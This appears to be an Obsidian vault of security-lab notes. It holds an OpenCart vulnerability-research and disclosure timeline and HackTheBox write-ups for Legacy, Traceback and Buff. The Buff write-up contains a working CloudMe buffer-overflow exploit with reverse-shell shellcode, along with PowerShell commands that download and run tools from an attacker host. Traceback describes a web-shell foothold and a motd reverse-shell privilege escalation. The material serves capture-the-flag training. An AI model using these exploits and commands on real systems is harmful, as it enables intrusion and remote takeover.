--------------------------------------------------------------------------------
/Labs/Lab 2 - Vuln. Research/opencart - CVE-2023-47444.md:
--------------------------------------------------------------------------------
1 | ---
2 | category:
3 | - Web
4 | tags:
5 | - opencart
6 | - open-redirection
7 | - XSS
8 | - CSRF
9 | - path-traversal
10 | - vulnerability-research
11 | - code-review
12 | - RCE
13 | - vulnerability-research/finished
14 | last-time: 2023-10-15
15 | ---
16 |
17 | # General Information
18 | ## Time-line
19 |
20 | >[!summary] Events and findings timeline:
21 | >**06/07/2023**:
22 | >- Set up the environment and started the analysis
23 | >
24 | >**25/09/2023**:
25 | >- Tested and confirmed CVE-2023-2315 - Path Traversal in `log.php`, allowing to clear any writable file
26 | >- Discovered a Path Traversal in `common/filemanager` which allows to enumerate filesystem's directories
27 | >- Found an arbitrary file upload in `common/filemanager.upload` but cannot change extensions
28 | >- Found an arbitrary file upload in `catalog/download.upload` but cannot guess the final name
29 | >
30 | >**01/10/2023:**
31 | >- Tested various bypasses and chains in order to escalate severity for Path Traversal and File upload, but without success
32 | >- Discovered a Self-Reflected XSS in `catalog/product.form` caused by CKEditor
33 | >- Noticed that `user_token` is not included in Refer header when GET request are sent cross origin → [Default Referrer-Policy]()
34 | >- Discovered a parameter pollution and open redirection in `account/login.login`
35 | >- Tested Gift and Coupon functionality: no race condition have been found, it seems that only one code for purchase is allowed. To better investigate...
36 | >
37 | >**11/10/2023:**
38 | >- Discovered a path traversal in `common/security.storage` that allows to copy the content of `/system` anywhere in the filesystem
39 | >- Discovered a RCE in `common/security.storage` caused because the `config.php` can be overwritten with any arbitrary value
40 | >
41 | >**12/10/2023**:
42 | >- Fixed the PoC so that application keeps working as intended
43 | >
44 | >**13/10/2023:**
45 | >- Discovered a RCE in `common/security.admin` caused because the new `config.php` can be created injected arbitrary PHP code
46 | >
47 | >**14/10/2023**:
48 | >- Finished looking all the `$file` references, without finding anything new
49 | >- Looked at forgot password, login and registration process, without finding anything suspicious
50 | >
51 | > **17/10/2023**:
52 | > - Contacted OpenCart at support@opencart.com
53 | >
54 | >**24/10/2023**:
55 | >- Contacted OpenCart at webmaster@opencart.com
56 | >
57 | >**30/10/2023**:
58 | >- Published a post (https://forum.opencart.com/viewtopic.php?t=232348) on the official OpenCart forum as a final attempt to contact the OpenCart team
59 | >
60 | >**02/11/2023**:
61 | >- Sent a PM to an Administrator on the official OpenCart forum as a very last resort to contact the OpenCart staff
62 | >as a final attempt to contact the OpenCart team.
63 | >
64 | >**10/11/2023**:
65 | >- Assigned CVE-2023-47444
66 | >
67 | >- **10/11/2023**: Sent a PM to another Administrator on the official OpenCart forum as a very last resort to contact the OpenCart staff.
68 | >- **11/11/2023**: Get a _kindly_ response from an OpenCart Administrator
69 | >- **14/11/2023**: Public release and opened a GitHub issue ([#12947](https://github.com/opencart/opencart/issues/12947))
70 | >- **15/11/2023**: Opened a pull request ([#12949](https://github.com/opencart/opencart/pull/12949)) with a hotfix, but closed immediately by administrator. GitHub issue also closed by administrator after having marked it as spam and a “non vulnerability”.
71 | >- **16/11/2023**: Fix ([#12951](https://github.com/opencart/opencart/pull/12951)) merged to master
72 |
73 | ## Canvas
74 |
75 | 
76 |
77 | # Set Up
78 |
79 | - Downloaded archive: https://github.com/opencart/opencart/releases/tag/4.0.2.2
80 | - Web server: Apache + MySQL
81 |
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/Legacy.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags:
3 | - HackTheBox
4 | - Easy
5 | - Windows
6 | - MS08-067
7 | - CVE-2008-4250
8 | - RCE
9 | - B2R
10 | aliases:
11 | - 10.10.10.4
12 | ---
13 |
14 | # Legacy - 10.10.10.4 [Easy]
15 |
16 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
17 | Hacking is fun if you're a Hacker.
18 | - Anonymous
19 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
20 |
21 |
22 | ## Information Gathering
23 | ```
24 | PORT STATE SERVICE VERSION
25 | 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
26 | 137/udp open netbios-ns
27 | 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
28 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
29 | Device type: general purpose
30 | Running: Microsoft Windows XP|7|2012
31 | OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
32 | OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
33 | Network Distance: 2 hops
34 | Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
35 | ```
36 | ## Enumeration
37 | ``` bash
38 | root@kali:~/ownCloud/Documents/CTF/HTB/Machine/Legacy# enum4linux 10.10.10.4
39 | Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 12 11:59:25 2020
40 |
41 | ==========================
42 | | Target Information |
43 | ==========================
44 | Target ........... 10.10.10.4
45 | RID Range ........ 500-550,1000-1050
46 | Username ......... ''
47 | Password ......... ''
48 | Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
49 |
50 |
51 | ==================================================
52 | | Enumerating Workgroup/Domain on 10.10.10.4 |
53 | ==================================================
54 | [+] Got domain/workgroup name: HTB
55 |
56 | ==========================================
57 | | Nbtstat Information for 10.10.10.4 |
58 | ==========================================
59 | Looking up status of 10.10.10.4
60 | LEGACY <00> - B Workstation Service
61 | HTB <00> - B Domain/Workgroup Name
62 | LEGACY <20> - B File Server Service
63 | HTB <1e> - B Browser Service Elections
64 | HTB <1d> - B Master Browser
65 | ..__MSBROWSE__. <01> - B Master Browser
66 |
67 | MAC Address = 00-50-56-B9-28-22
68 |
69 | ===================================
70 | | Session Check on 10.10.10.4 |
71 | ===================================
72 | [E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
73 | ```
74 | ```bash
75 | Host script results:
76 | | smb-enum-shares:
77 | | note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
78 | | account_used:
79 | | \\10.10.10.4\ADMIN$:
80 | | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
81 | | Anonymous access:
82 | | \\10.10.10.4\C$:
83 | | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
84 | | Anonymous access:
85 | | \\10.10.10.4\IPC$:
86 | | warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
87 | |_ Anonymous access: READ
88 |
89 | Host script results:
90 | | smb-vuln-ms08-067:
91 | | VULNERABLE:
92 | | Microsoft Windows system vulnerable to remote code execution (MS08-067)
93 | | State: VULNERABLE
94 | | IDs: CVE:CVE-2008-4250
95 | | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
96 | | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
97 | | code via a crafted RPC request that triggers the overflow during path canonicalization.
98 | |
99 | | Disclosure date: 2008-10-23
100 | | References:
101 | | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
102 | |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
103 | |_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
104 | |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
105 | | smb-vuln-ms17-010:
106 | | VULNERABLE:
107 | | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
108 | | State: VULNERABLE
109 | | IDs: CVE:CVE-2017-0143
110 | | Risk factor: HIGH
111 | | A critical remote code execution vulnerability exists in Microsoft SMBv1
112 | | servers (ms17-010).
113 | |
114 | | Disclosure date: 2017-03-14
115 | | References:
116 | | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
117 | | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
118 | |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
119 | ```
120 | ## Exploit
121 | ![[attachments/1 (2).png]]
122 | ![[attachments/2 (2).png]]
123 |
124 | john: `e69af0e4f443de7e36876fda4ec7644f`
125 | Root: `993442d258b0e0ec917cae9e695d5713`
126 |
127 |
128 |
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/LAB 1.canvas:
--------------------------------------------------------------------------------
1 | {
2 | "edges": [
3 | {
4 | "fromEnd": "arrow",
5 | "fromNode": "c887a6cac33a7cc2",
6 | "fromSide": "right",
7 | "id": "9393bcb9818bbd10",
8 | "label": "shared credentials",
9 | "styleAttributes": {
10 | "path": "long-dashed"
11 | },
12 | "toNode": "72573fc592971e42",
13 | "toSide": "left"
14 | },
15 | {
16 | "fromNode": "d1827057f6a51d3e",
17 | "fromSide": "right",
18 | "id": "5e58ca7eed53c1ad",
19 | "label": "cron job",
20 | "styleAttributes": {
21 | "pathfindingMethod": "square"
22 | },
23 | "toNode": "72573fc592971e42",
24 | "toSide": "right"
25 | },
26 | {
27 | "fromNode": "d04166e5e9ed24b9",
28 | "fromSide": "right",
29 | "id": "4f2e1030ed334906",
30 | "label": "DMZ machine",
31 | "styleAttributes": {
32 | },
33 | "toNode": "b7610d496b7f5adf",
34 | "toSide": "left"
35 | },
36 | {
37 | "fromNode": "e9fdb96754442a77",
38 | "fromSide": "right",
39 | "id": "7a8caeae814ae697",
40 | "label": "double interface",
41 | "styleAttributes": {
42 | "path": "dotted",
43 | "pathfindingMethod": "square"
44 | },
45 | "toEnd": "none",
46 | "toNode": "ab788f62574ded0b",
47 | "toSide": "left"
48 | },
49 | {
50 | "fromEnd": "arrow",
51 | "fromNode": "d1827057f6a51d3e",
52 | "fromSide": "bottom",
53 | "id": "7f86e047789e05f4",
54 | "label": "double interface",
55 | "styleAttributes": {
56 | "path": "dotted"
57 | },
58 | "toNode": "86c50356a8efccce",
59 | "toSide": "top"
60 | },
61 | {
62 | "fromNode": "d04166e5e9ed24b9",
63 | "fromSide": "bottom",
64 | "id": "5b2bb03674cd6538",
65 | "label": "ssh -D foo@bar ...",
66 | "styleAttributes": {
67 | "arrow": null,
68 | "path": "short-dashed"
69 | },
70 | "toNode": "666398e56a7eb27e",
71 | "toSide": "left"
72 | }
73 | ],
74 | "nodes": [
75 | {
76 | "color": "3",
77 | "height": 720,
78 | "id": "666398e56a7eb27e",
79 | "label": "Network 3",
80 | "styleAttributes": {
81 | },
82 | "type": "group",
83 | "width": 2130,
84 | "x": -840,
85 | "y": 920
86 | },
87 | {
88 | "color": "5",
89 | "height": 1360,
90 | "id": "5ea77688a36a43f9",
91 | "label": "Network 1",
92 | "styleAttributes": {
93 | },
94 | "type": "group",
95 | "width": 720,
96 | "x": -640,
97 | "y": -640
98 | },
99 | {
100 | "color": "2",
101 | "height": 1360,
102 | "id": "7a6da4a21013d326",
103 | "label": "Network 2",
104 | "styleAttributes": {
105 | },
106 | "type": "group",
107 | "width": 700,
108 | "x": 320,
109 | "y": -640
110 | },
111 | {
112 | "color": "2",
113 | "height": 100,
114 | "id": "72573fc592971e42",
115 | "styleAttributes": {
116 | "textAlign": "center"
117 | },
118 | "text": "# [Postman](Network%202/Postman.md)",
119 | "type": "text",
120 | "width": 240,
121 | "x": 550,
122 | "y": -470
123 | },
124 | {
125 | "color": "1",
126 | "height": 100,
127 | "id": "d1827057f6a51d3e",
128 | "styleAttributes": {
129 | "textAlign": "center"
130 | },
131 | "text": "# [OpenAdmin](Network%202/OpenAdmin.md)",
132 | "type": "text",
133 | "width": 260,
134 | "x": 550,
135 | "y": 350
136 | },
137 | {
138 | "color": "4",
139 | "height": 120,
140 | "id": "ab788f62574ded0b",
141 | "styleAttributes": {
142 | },
143 | "text": "# [Buff](Network%201/Buff.md)",
144 | "type": "text",
145 | "width": 260,
146 | "x": 340,
147 | "y": -60
148 | },
149 | {
150 | "file": "Labs/Lab 1 - Example/Network 1/_Network 1 discovered IPs.md",
151 | "height": 200,
152 | "id": "7010c9c9b5862095",
153 | "styleAttributes": {
154 | },
155 | "type": "file",
156 | "width": 460,
157 | "x": -380,
158 | "y": -840
159 | },
160 | {
161 | "color": "1",
162 | "file": "Labs/Lab 1 - Example/Network 3/Tabby.md",
163 | "height": 400,
164 | "id": "2d9ffd18998632f9",
165 | "styleAttributes": {
166 | },
167 | "type": "file",
168 | "width": 400,
169 | "x": -590,
170 | "y": 1080
171 | },
172 | {
173 | "color": "1",
174 | "file": "Labs/Lab 1 - Example/Network 3/Traceback.md",
175 | "height": 400,
176 | "id": "18b4403b0e055c7e",
177 | "styleAttributes": {
178 | },
179 | "type": "file",
180 | "width": 400,
181 | "x": 30,
182 | "y": 1080
183 | },
184 | {
185 | "color": "1",
186 | "height": 100,
187 | "id": "86c50356a8efccce",
188 | "styleAttributes": {
189 | "textAlign": "center"
190 | },
191 | "text": "# [OpenAdmin](Network%202/OpenAdmin.md)",
192 | "type": "text",
193 | "width": 260,
194 | "x": 690,
195 | "y": 1080
196 | },
197 | {
198 | "color": "2",
199 | "file": "Labs/Lab 1 - Example/Network 1/Legacy.md",
200 | "height": 280,
201 | "id": "c887a6cac33a7cc2",
202 | "styleAttributes": {
203 | },
204 | "type": "file",
205 | "width": 500,
206 | "x": -530,
207 | "y": -560
208 | },
209 | {
210 | "color": "4",
211 | "file": "Labs/Lab 1 - Example/Network 1/Buff.md",
212 | "height": 360,
213 | "id": "e9fdb96754442a77",
214 | "styleAttributes": {
215 | },
216 | "type": "file",
217 | "width": 500,
218 | "x": -530,
219 | "y": -220
220 | },
221 | {
222 | "color": "4",
223 | "file": "Labs/Lab 1 - Example/Network 1/Writeup.md",
224 | "height": 400,
225 | "id": "b7610d496b7f5adf",
226 | "styleAttributes": {
227 | },
228 | "type": "file",
229 | "width": 500,
230 | "x": -530,
231 | "y": 200
232 | },
233 | {
234 | "color": "6",
235 | "height": 140,
236 | "id": "d04166e5e9ed24b9",
237 | "styleAttributes": {
238 | "textAlign": "center"
239 | },
240 | "text": "# Attacker machine",
241 | "type": "text",
242 | "width": 280,
243 | "x": -1120,
244 | "y": -630
245 | }
246 | ]
247 | }
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 3/Traceback.md:
--------------------------------------------------------------------------------
1 | ---
2 | Tags: HackTheBox Easy Linux OSINT luvit lua lateral-movement insecure-file-permissions B2R
3 | Alias: Traceback - 10.10.10.181
4 | ---
5 | # 10.10.10.181 - Traceback [Easy]
6 |
7 | 
8 |
9 | ***
10 |
11 | ### Improved skills:
12 |
13 | - OSINT
14 | - Luvit lateral movement
15 | - motd privilege escalation
16 |
17 | ### Used tools:
18 |
19 | - nmap
20 | - owasp zap
21 | - pspy64
22 | - netcat
23 |
24 | ***
25 |
26 |
27 |
28 | ## Introduction & Foothold
29 |
30 | Like for every CTF we made, let's start scanning the box with **nmap**
31 |
32 | ```bash
33 | $ nmap 10.10.10.181 --top-ports 25 --open -sC -sV -oA nmap/openPorts.txt
34 | PORT STATE SERVICE VERSION
35 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
36 | | ssh-hostkey:
37 | | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
38 | | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
39 | |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
40 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
41 | |_http-server-header: Apache/2.4.29 (Ubuntu)
42 | |_http-title: Help us
43 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
44 | ```
45 |
46 | As we can see, there are only two services exposed: **SSH** (port 22) and the **Apache Web Server** (port 80).
47 |
48 | Visiting the site, we discover that the machine **has been owned** and _there is a backdoor_
49 |
50 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/1.png]]
51 |
52 |
53 | Looking to the source code of the page, a comment comes out.
54 |
55 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/2.png]]
56 |
57 | Searching it on google, it reveals to be the description of a repo containing only web-shells. _We can suppose that one of those shells is the one used in this machine_.
58 |
59 | Assuming this, lets **create a wordlist using the discovered shells' name** and **fuzz** the web page in order to find the correct one.
60 |
61 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/3.png]]
62 |
63 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/4.png]]
64 |
65 | **Bingo!** `smevk.php` is the web shell used on the box.
66 |
67 | ![[HTB/Machines/Traceback - 10.10.10.181/attachments/5.png]]
68 |
69 | **Credentials** can be found **on the source code on github.** Easily guessable, the combination is `admin:admin`
70 |
71 | ![[attachments/6.png]]
72 |
73 | Once inside, we can easily submit commands to the box.
74 | In order to get a more stable and comfortable shell, **I added my SSH key to the `authorized_keys` file**, obtaining an SSH access as **webadmin**.
75 |
76 | ![[attachments/7.png]]
77 |
78 | ![[attachments/8.png]]
79 |
80 | ## Lateral Movement to sysadmin
81 |
82 | Listing all the files within the webadmin home directory, we discovered the presence of [Luvit](https://luvit.io/), a
83 |
84 | > scripting platform just like `node`. This can be used to run lua scripts as standalone servers, clients, or other tools.
85 |
86 | Furthermore, **webadmin has the permissions to run luvit as sysadmin** using **sudo**. It becames easy to perform action as sysadmin, like reading files
87 |
88 | ![[attachments/9.png]]
89 | or getting a shell:
90 |
91 | ![[attachments/10.png]]
92 |
93 | ## Privilege Escalation
94 |
95 | Analyzing the processes running on the machine I noticed the **presence of a process owned by the root modifiable by sysadmin**.
96 |
97 | ```bash
98 | 2020/03/15 15:45:01 CMD: UID=106 PID=28288 | sshd: [net]
99 | 2020/03/15 15:45:01 CMD: UID=0 PID=28290 | run-parts --lsbsysinit /etc/update-motd.d
100 | 2020/03/15 15:45:01 CMD: UID=0 PID=28289 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
101 | 2020/03/15 15:45:01 CMD: UID=0 PID=28297 | cut -c -80
102 | 2020/03/15 15:45:01 CMD: UID=0 PID=28296 |
103 | 2020/03/15 15:45:01 CMD: UID=0 PID=28295 |
104 | 2020/03/15 15:45:01 CMD: UID=0 PID=28293 | /bin/sh /etc/update-motd.d/50-motd-news
105 | 2020/03/15 15:45:01 CMD: UID=0 PID=28298 | run-parts --lsbsysinit /etc/update-motd.d
106 | 2020/03/15 15:45:01 CMD: UID=0 PID=28299 | /usr/bin/python3 -Es /usr/bin/lsb_release -cs
107 | 2020/03/15 15:45:01 CMD: UID=0 PID=28301 | /usr/sbin/CRON -f
108 | 2020/03/15 15:45:01 CMD: UID=0 PID=28300 | /usr/sbin/CRON -f
109 | 2020/03/15 15:45:01 CMD: UID=0 PID=28305 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
110 | 2020/03/15 15:45:01 CMD: UID=0 PID=28304 | sleep 30
111 | 2020/03/15 15:45:01 CMD: UID=0 PID=28303 | /bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
112 | 2020/03/15 15:45:01 CMD: UID=0 PID=28302 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
113 | 2020/03/15 15:45:01 CMD: UID=0 PID=28306 | /usr/bin/python3 -Es /usr/bin/lsb_release -ds
114 | 2020/03/15 15:45:01 CMD: UID=0 PID=28307 | /bin/sh /etc/update-motd.d/91-release-upgrade
115 | 2020/03/15 15:45:01 CMD: UID=0 PID=28310 | cut -d -f4
116 | 2020/03/15 15:45:01 CMD: UID=0 PID=28309 | /usr/bin/python3 -Es /usr/bin/lsb_release -sd
117 | 2020/03/15 15:45:01 CMD: UID=0 PID=28308 | /bin/sh /etc/update-motd.d/91-release-upgrade
118 | 2020/03/15 15:45:02 CMD: UID=0 PID=28315 | sshd: sysadmin [priv]
119 | 2020/03/15 15:45:02 CMD: UID=1001 PID=28316 | -sh
120 | ```
121 |
122 | `/etc/update-motd.d/50-motd-news` is called **every time a user logs into the box**, with **root privileges**. However, **this file can be edited from non-root users**.
123 | Abusing this issue, let's use the reverse shell script used before in order to obtain a reverse shell as root at the next login.
124 |
125 | ```bash
126 | sysadmin@traceback:~$ nano /etc/update-mot.d/50-motd-news
127 |
128 | #!/bin/bash
129 | /bin/bash /tmp/revShell.sh
130 | ...
131 | ```
132 |
133 | ![[attachments/11.png]]
134 |
135 | ## Trophy
136 |
137 | > Aim for the sky, but move slowly, enjoying every step along the way.
138 | > It is all those little steps that make the journey complete.
139 | > \- Chanda Kochhar
140 |
141 |
142 | ## License
143 |
144 | Author: 0x*bro*
145 |
146 | 
147 | This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/Buff.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags:
3 | - HackTheBox
4 | - Easy
5 | - B2R
6 | - Windows
7 | - Gym-Management-System
8 | - RCE
9 | - Buffer-Overflow
10 | - CloudMe
11 | - port-forwarding
12 | aliases:
13 | - 10.10.10.198
14 | ---
15 |
16 | # 10.10.10.198 - Buff [Easy]
17 |
18 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
19 | It is better to have your head in the clouds, and know where you are... than to breathe the clearer atmosphere below them, and think that you are in paradise.
20 | - Henry David Thoreau
21 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
22 |
23 | ## Information Gathering
24 | ``` bash
25 | root@kali:~/CTF/HackTheBox/Machine/Buff# nmap 10.10.10.198 -p 8080,7680 -sC -oA files/nmap/open-services
26 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-22 21:43 CEST
27 | Nmap scan report for 10.10.10.198
28 | Host is up (0.037s latency).
29 |
30 | PORT STATE SERVICE
31 | 7680/tcp open pando-pub
32 | 8080/tcp open http-proxy
33 | |_http-open-proxy: Proxy might be redirecting requests
34 | |_http-title: mrb3n's Bro Hut
35 |
36 | Nmap done: 1 IP address (1 host up) scanned in 10.76 seconds
37 | ```
38 |
39 |
40 | 
41 |
42 | “Gym Management Software 1.0” == **Gym Management System 1.0**
43 | https://www.exploit-db.com/exploits/48506
44 |
45 | 
46 |
47 | 
48 |
49 | `4b5b023a28f09d7bbace384b13095dfe`
50 |
51 | ## Privilege Escalation
52 | ``` powershell
53 | echo $webclient = New-Object System.Net.WebClient >wget.ps1
54 | echo $url = "http://10.10.14.39/nc.exe" >>wget.ps1
55 | echo $file = "nc.exe" >>wget.ps1
56 | echo $webclient.DownloadFile($url,$file) >>wget.ps1
57 |
58 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
59 | ```
60 | 
61 | ``` powershell
62 | Proto Local Address Foreign Address State
63 |
64 | TCP 0.0.0.0:135 BUFF:0 LISTENING
65 | TCP 0.0.0.0:445 BUFF:0 LISTENING
66 | TCP 0.0.0.0:5040 BUFF:0 LISTENING
67 | TCP 0.0.0.0:7680 BUFF:0 LISTENING
68 | TCP 0.0.0.0:8080 BUFF:0 LISTENING
69 | TCP 0.0.0.0:49664 BUFF:0 LISTENING
70 | TCP 0.0.0.0:49665 BUFF:0 LISTENING
71 | TCP 0.0.0.0:49666 BUFF:0 LISTENING
72 | TCP 0.0.0.0:49667 BUFF:0 LISTENING
73 | TCP 0.0.0.0:49668 BUFF:0 LISTENING
74 | TCP 0.0.0.0:49669 BUFF:0 LISTENING
75 | TCP 10.10.10.198:139 BUFF:0 LISTENING
76 | TCP 10.10.10.198:8080 10.10.14.29:48092 ESTABLISHED
77 | TCP 10.10.10.198:8080 10.10.14.39:40996 CLOSE_WAIT
78 | TCP 10.10.10.198:8080 10.10.14.39:41084 ESTABLISHED
79 | TCP 10.10.10.198:49697 10.10.14.39:http ESTABLISHED
80 | TCP 10.10.10.198:49707 10.10.14.29:4000 ESTABLISHED
81 | TCP 127.0.0.1:3306 BUFF:0 LISTENING
82 | TCP 127.0.0.1:8888 BUFF:0 LISTENING
83 | ```
84 | https://www.exploit-db.com/exploits/48389
85 | https://bufferoverflows.net/practical-exploitation-part-1-cloudme-sync-1-11-2-bufferoverflow-seh/
86 |
87 | Move the CloudMe_1112.exe file locally and testing it on a dev machine.
88 | Minimal sostitutions to 48389.py
89 | ``` python
90 | # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
91 | # Date: 2020-04-27
92 | # Exploit Author: Andy Bowden
93 | # Vendor Homepage: https://www.cloudme.com/en
94 | # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
95 | # Version: CloudMe 1.11.2
96 | # Tested on: Windows 10 x86
97 |
98 | #Instructions:
99 | # Start the CloudMe service and run the script.
100 |
101 | import socket
102 |
103 | target = "127.0.0.1"
104 |
105 | padding1 = b"\x90" * 1052
106 | EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
107 | NOPS = b"\x90" * 30
108 |
109 | #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.39 LPORT=443 -a x86 -f python -b '\x00\x0A\x0D' --> LEN 351
110 | buf = b""
111 | buf += b"\xbd\xae\xea\xd2\xc4\xd9\xc3\xd9\x74\x24\xf4\x58\x31"
112 | buf += b"\xc9\xb1\x52\x31\x68\x12\x83\xc0\x04\x03\xc6\xe4\x30"
113 | buf += b"\x31\xea\x11\x36\xba\x12\xe2\x57\x32\xf7\xd3\x57\x20"
114 | buf += b"\x7c\x43\x68\x22\xd0\x68\x03\x66\xc0\xfb\x61\xaf\xe7"
115 | buf += b"\x4c\xcf\x89\xc6\x4d\x7c\xe9\x49\xce\x7f\x3e\xa9\xef"
116 | buf += b"\x4f\x33\xa8\x28\xad\xbe\xf8\xe1\xb9\x6d\xec\x86\xf4"
117 | buf += b"\xad\x87\xd5\x19\xb6\x74\xad\x18\x97\x2b\xa5\x42\x37"
118 | buf += b"\xca\x6a\xff\x7e\xd4\x6f\x3a\xc8\x6f\x5b\xb0\xcb\xb9"
119 | buf += b"\x95\x39\x67\x84\x19\xc8\x79\xc1\x9e\x33\x0c\x3b\xdd"
120 | buf += b"\xce\x17\xf8\x9f\x14\x9d\x1a\x07\xde\x05\xc6\xb9\x33"
121 | buf += b"\xd3\x8d\xb6\xf8\x97\xc9\xda\xff\x74\x62\xe6\x74\x7b"
122 | buf += b"\xa4\x6e\xce\x58\x60\x2a\x94\xc1\x31\x96\x7b\xfd\x21"
123 | buf += b"\x79\x23\x5b\x2a\x94\x30\xd6\x71\xf1\xf5\xdb\x89\x01"
124 | buf += b"\x92\x6c\xfa\x33\x3d\xc7\x94\x7f\xb6\xc1\x63\x7f\xed"
125 | buf += b"\xb6\xfb\x7e\x0e\xc7\xd2\x44\x5a\x97\x4c\x6c\xe3\x7c"
126 | buf += b"\x8c\x91\x36\xd2\xdc\x3d\xe9\x93\x8c\xfd\x59\x7c\xc6"
127 | buf += b"\xf1\x86\x9c\xe9\xdb\xae\x37\x10\x8c\xda\xcd\x14\x6b"
128 | buf += b"\xb3\xd3\x28\x72\xf8\x5d\xce\x1e\xee\x0b\x59\xb7\x97"
129 | buf += b"\x11\x11\x26\x57\x8c\x5c\x68\xd3\x23\xa1\x27\x14\x49"
130 | buf += b"\xb1\xd0\xd4\x04\xeb\x77\xea\xb2\x83\x14\x79\x59\x53"
131 | buf += b"\x52\x62\xf6\x04\x33\x54\x0f\xc0\xa9\xcf\xb9\xf6\x33"
132 | buf += b"\x89\x82\xb2\xef\x6a\x0c\x3b\x7d\xd6\x2a\x2b\xbb\xd7"
133 | buf += b"\x76\x1f\x13\x8e\x20\xc9\xd5\x78\x83\xa3\x8f\xd7\x4d"
134 | buf += b"\x23\x49\x14\x4e\x35\x56\x71\x38\xd9\xe7\x2c\x7d\xe6"
135 | buf += b"\xc8\xb8\x89\x9f\x34\x59\x75\x4a\xfd\x69\x3c\xd6\x54"
136 | buf += b"\xe2\x99\x83\xe4\x6f\x1a\x7e\x2a\x96\x99\x8a\xd3\x6d"
137 | buf += b"\x81\xff\xd6\x2a\x05\xec\xaa\x23\xe0\x12\x18\x43\x21"
138 |
139 | overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + buf))
140 |
141 | expl = padding1 + EIP + NOPS + buf + overrun
142 |
143 | try:
144 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
145 | s.connect((target,8888))
146 | s.send(expl)
147 | except Exception as e:
148 | print(sys.exc_value)
149 | ```
150 |
151 | ``` powershell
152 | echo '$webclient = New-Object System.Net.WebClient' > wget.ps1
153 | echo '$url = "http://10.10.14.39/plink-x64.exe"' >>wget.ps1
154 | echo '$file = "plink.exe"' >>wget.ps1
155 | echo '$webclient.DownloadFile($url,$file)' >>wget.ps1
156 |
157 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
158 |
159 | .\plink.exe -ssh -l root -R 8888:127.0.0.1:8888 10.10.14.39
160 | ```
161 | 
162 | 
163 | 
164 |
165 | `a19f68f858b4464cdc8a7d5415d7bd0f`
--------------------------------------------------------------------------------
/Labs/Lab 1 - Example/Network 1/Writeup.md:
--------------------------------------------------------------------------------
1 | ---
2 | tags:
3 | - HacktheBox
4 | - Linux
5 | - Easy
6 | - CMS-Made-Simple
7 | - SQL-injection
8 | - binary-hijacking-privesc
9 | - B2R
10 | aliases:
11 | - 10.10.10.138
12 | ---
